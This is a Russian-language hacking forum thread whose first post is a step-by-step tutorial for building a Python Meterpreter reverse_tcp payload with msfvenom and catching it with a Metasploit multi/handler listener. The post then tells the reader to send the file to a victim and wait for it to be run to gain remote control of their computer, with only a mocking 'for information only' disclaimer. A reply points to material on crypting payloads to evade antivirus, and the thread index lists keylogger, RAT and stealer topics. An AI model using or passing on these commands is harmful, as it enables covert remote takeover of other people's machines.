Интересно Metasploit и Python

Eteriass

Pro Member
Сообщения
107
Реакции
203
Посетить сайт
1605624573403.png
Привет друзья. Более чем уверен, что большинство из вас знакомы с таким зАмаечательным фреймворком для пентеста как Metasploit Framework, а тем кто им пользуется изевстны такие понятия как meterpreter, payload, handler и тд. Про них собственно мы сегодня и поговорим. Про удаленный доступ через метасплоит и пайтон. Причем же тут пайтон? А при том что изпользовать мы будем полезную нагрузку на нем, для разннобразия так сказать.

Для сего кулинарно-компьютерного пиздеца нам понадобиться:
1. Собственно сам метасплоит
2. Установленный пайтон
3.И какая нибудь дырка для выхода за пределы локалхоста, будь то VPN, статический ip, туннель , или выделенный сервер. Тут уж как нибудь сами выберите, из того что есть под рукой. Лично я буду использовать туннель
И так, начнем
:

Как и любой немножечко умный повар мы начнем с подготовки главного ингредиента, проще говоря генерируем полезную нагрузку с помощью msfvenom. Так как использовать я буду payload на python, моя команда выглядит так:
msfvenom -p python/meterpreter/reverse_tcp lhost= ваш ip lport=порт > /home/eteriass/Desktop/payload_python.py



VirtualBox_ParrotHome_13_10_2020_22_15_36.png
Полезная нагрузка готова. Теперь нужно как то прослушивать порт , чтобы не проебать удаелнку. Запускаем метасплоит
  • msfconsole - тут без коментариев, все знают шо это
  • use exploit/multi/handler - это тот самый слушатель
  • set lhost XXXXXXXX - Это наш ip
  • set lport XXXXX - Это порт который нужно прослушивать
  • exploit - запуск прослушивания
Теперь отправляем файл жертве и ждем пока его запустят , после чего мы получим удаленный доступ к скомпрометированному компьютеру. VirtualBox_ParrotHome_13_10_2020_22_18_25.png
В моем случае ждать не пришлось, потому что жертвой был я сам, и как видите доступ получен.
Такие дела друзья. Метасплоит сам по себе очень мошный и интересный инструмент, владеть которым следует всем, начиная от пентестеров и до мамкиных черношляпников.
На этом пожалуй все и не забывайте, что статья написана только для ознокомления, и вообще все это фотошоп, монтаж, бред, бдсм и другие умные слова. А автор писал под диктовку высших сил, и в душе не ебет че только что произошло, вот. А с вами был чумной доктор, чей ник в 2020-ом году звучит уже не так весело. Увидимся, ну, когда нибудь...


P.s. Чисто спонтанно решил добавить водяные знаки, некоторые жители Казахстана тут совсем непричем
 
Последнее редактирование:

StanislavP

Member
Сообщения
20
Реакции
16
Посетить сайт
Ещё есть похожая

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, но с анализом работы Meterpreter, reverse_tcp и прочих функций, которые работают на Python3. Это многим поможет найти ответ на вопрос по типу "Как закриптовать payload" или "почему антивирус ругается на файл".
 
Название темы
Автор Заголовок Раздел Ответы Дата
Eteriass Интересно Что такое koadic и почему не metasploit? Уязвимости и взлом 7
L Собираем информации о базах данных PostgreSQL используя Metasploit Уязвимости и взлом 0
B Проверено Metasploit Pro Patcher (Extended Version) Malware, эксплойты, связки, крипт 0
klobald Metasploit для юнцов [Часть 1] Уязвимости и взлом 1
kdroshev PentestIT-Тестирование на проникновение с использованием Metasploit Framework https://cloud.mail.ru/public/HQgW/7oreizmBV Другое 0
klobald Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #2 Уязвимости и взлом 0
klobald Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #1 Уязвимости и взлом 3
S Ошибка metasploit wmap Уязвимости и взлом 1
ins1der Взлом удаленного доступа nmap + metasploit (Kali linux) Полезные статьи 1
ins1der Взлом windows 7-10 с помощью setoolkit и metasploit (Kali Linux) Полезные статьи 4
E [Видео] Взламываем Android девайс с помощью Metasploit Уязвимости и взлом 1
Bad-Dag Введение в Metasploit Framework Уязвимости и взлом 4
Admin Взлом удаленного ПК. Veil-Evasion. Metasploit. Уязвимости и взлом 4
Admin Bypass UAC. Metasploit. Уязвимости и взлом 0
Admin Aналог Metasploit для роутеров WiFi/Wardriving/Bluejacking 4
ВЛАД013 ByPassCaptcha Python Другие ЯП 0
LightMan Интересно Шифруемся используя python (Крипто контейнеры и DPAPI) Другие ЯП 0
Gumanoid Бомбер для ПК на Python Spam/DDOS/Malware 2
ioctl Python программист для разных задач. Ищу работу. Предлагаю свои услуги. 1
Anorali Свой мини кейлоггер на python. Часть 3 Вирусология 2
Anorali Свой мини кейлоггер на python. Часть 2 Вирусология 0
Anorali Свой мини кейлоггер на python Вирусология 4
_ZerO_ Интересно Python и LongPoll VK, или как запустить скрипт ВК и настроит Другие ЯП 2
G Команда разработчиков - php, python, веб дизайн, программирование Ищу работу. Предлагаю свои услуги. 0
Shukumei Интересно CrazyPy - Пак самых нужных модулей для создания вирусов на python Другие ЯП 6
CMDfromBAT Интересно TeleSpy Telegram RAT by CMDfromBAT на языке Python Вирусология 22
blazar нужна помощь Python | автоматизация работы в браузере Вопросы и интересы 1
E Интересно Бот с автооплатой на Python Другие ЯП 10
#~Shinigami~# Интересно Свой мини-рат на python + стиллер хрома v80 Софт от наших юзеров 8
M Декомпиляция Python Другие ЯП 1
M TBomb: Ещё один бомбер на python для termux Другие ЯП 0
M Спам комментариями в ВК {PYTHON} Другие ЯП 2
B [Udemy] Полное руководство по Python. Python Programming Bootcamp (2019) Другие ЯП 2
M Защищаем свой Python скрипт за пару минут Другие ЯП 0
M Разные винлокеры,на VBS и PYTHON Другие ЯП 0
B Клиент-серверная игра на Python Полезные статьи 0
B Python. Полное руководство (2019) Полезные статьи 0
B Основы языка Python (2019) Полезные статьи 0
Enotnutiy Не могу запустить Python на Kali Вопросы и интересы 1
DIN6921 Кодер ищет проекты/работу [Asm/C/Python] Ищу работу. Предлагаю свои услуги. 0
mostbiggestshark СЛИВ КУРСА Development Script-Python для Начинающих (2019) Корзина 4
A Эликсир для программистов на Python Полезные статьи 0
A Что нового в Python 3.8? Полезные статьи 0
A Веб-очистка с BeautifulSoup в Python Другие ЯП 0
Forevonly Python для хакера - Часть 4. Свой мини фреймворк. Другие ЯП 1
Forevonly Python для хакера - Часть 3. Сбор информации об IP и пробиваем номер сотового. Другие ЯП 1
Forevonly Python для хакера - Часть 2. Другие ЯП 1
Forevonly Python для хакера - Часть 1. Начало. Другие ЯП 5
R Не изучай синтаксис, изучай псевдокод и программирование! *Python* Другие ЯП 3
Sasha3I8I2 Вирус на Python Софт для работы с текстом/Другой софт 7

Название темы